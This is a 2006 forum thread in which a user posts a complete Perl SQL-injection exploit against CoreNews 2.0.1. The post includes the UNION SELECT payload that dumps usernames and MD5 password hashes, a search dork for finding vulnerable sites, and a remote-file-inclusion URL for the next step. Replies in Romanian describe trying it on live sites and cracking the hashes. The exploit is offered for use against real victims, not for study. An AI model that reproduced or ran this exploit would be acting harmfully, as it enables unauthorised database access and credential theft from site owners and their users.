Screech Posted July 4, 2006 Report Share Posted July 4, 2006 Download tut: http://rapidshare.de/files/24936927/core_n..._2.0.1.rar.htmlSearch: Powered by CoreNews 2.0.1Exploit: #!/usr/bin/perl#Method found & Exploit scripted by nukedx#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com#Original advisory: http://www.nukedx.com/?viewdoc=24#Usage: corenews.pl <host> <path>use IO::Socket;if(@ARGV != 2) { usage(); }else { exploit(); }sub header(){ print "n- NukedX Security Advisory Nr.2006-24rn"; print "- CoreNews <= 2.0.1 Remote SQL Injection Exploitrn";}sub usage() { header(); print "- Usage: $0 <host> <path>rn"; print "- <host> -> Victim's host ex: http://www.victim.comrn"; print "- <path> -> Path to CoreNews ex: /corenews/rn"; exit();}sub exploit () { #Our variables... $cnserver = $ARGV[0]; $cnserver =~ s/(http://)//eg; $cnhost = "http://".$cnserver; $cndir = $ARGV[1]; $cnport = "80"; $cntar = "preview.php?userid="; $cnxp = "-1/**/UNION/**/SELECT/**/null,concat(2022,login,20223,password,2203),null,null,null,null/**/FROM/**/corenews_users/*"; $cnreq = $cnhost.$cndir.$cntar.$cnxp; #Sending data... header(); print "- Trying to connect: $cnserverrn"; $cn = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$cnserver", PeerPort => "$cnport") || die "- Connection failed...n"; print $cn "GET $cnreq HTTP/1.1n"; print $cn "Accept: */*n"; print $cn "Referer: $cnhostn"; print $cn "Accept-Language: trn"; print $cn "User-Agent: NukeZillan"; print $cn "Cache-Control: no-cachen"; print $cn "Host: $cnservern"; print $cn "Connection: closenn"; print "- Connected...rn"; while ($answer = <$cn>) { if ($answer =~ /2022(.*?)20223([d,a-f]{32})2203/) { print "- Exploit succeed!rn"; print "- Username: $1rn"; print "- MD5 HASH of PASSWORD: $2rn"; print "- If you crack hash you can use RFI with example ->rn"; print "- Example: $cnhost$cndir?show=http://yourhost.com/file.txtrn"; exit(); } } #Exploit failed... print "- Exploit failedn"}[/list:u] Quote Link to comment Share on other sites More sharing options...
Thunder Posted July 4, 2006 Report Share Posted July 4, 2006 Mersi . Il iau acum . Revin cu comentarii .. Quote Link to comment Share on other sites More sharing options...
Thunder Posted July 4, 2006 Report Share Posted July 4, 2006 Nu mia iesit pe nici-un site . Oricum poate oi fi gresit pe undeva . Daca reuseste iti da md5 care doar daca ai noroc poti sa-l " descifrezi " si sa aflii passul . Quote Link to comment Share on other sites More sharing options...
Screech Posted July 5, 2006 Author Report Share Posted July 5, 2006 Norocul nu-l ai, ti-l faci. Quote Link to comment Share on other sites More sharing options...
johnslax Posted August 7, 2006 Report Share Posted August 7, 2006 numai merge linkul : :@ Quote Link to comment Share on other sites More sharing options...
Screech Posted August 8, 2006 Author Report Share Posted August 8, 2006 <div class='quotetop'>QUOTE("johnslax")</div>numai merge linkul : :@http://rapidshare.de/files/28591545/core_n..._2.0.1.rar.html Quote Link to comment Share on other sites More sharing options...
zbeng Posted August 8, 2006 Report Share Posted August 8, 2006 NU MAI faceti dublu post pt asat aveti butonul EDIT Quote Link to comment Share on other sites More sharing options...
SpLo1T Posted August 10, 2006 Report Share Posted August 10, 2006 merci Celebro Xavier Quote Link to comment Share on other sites More sharing options...
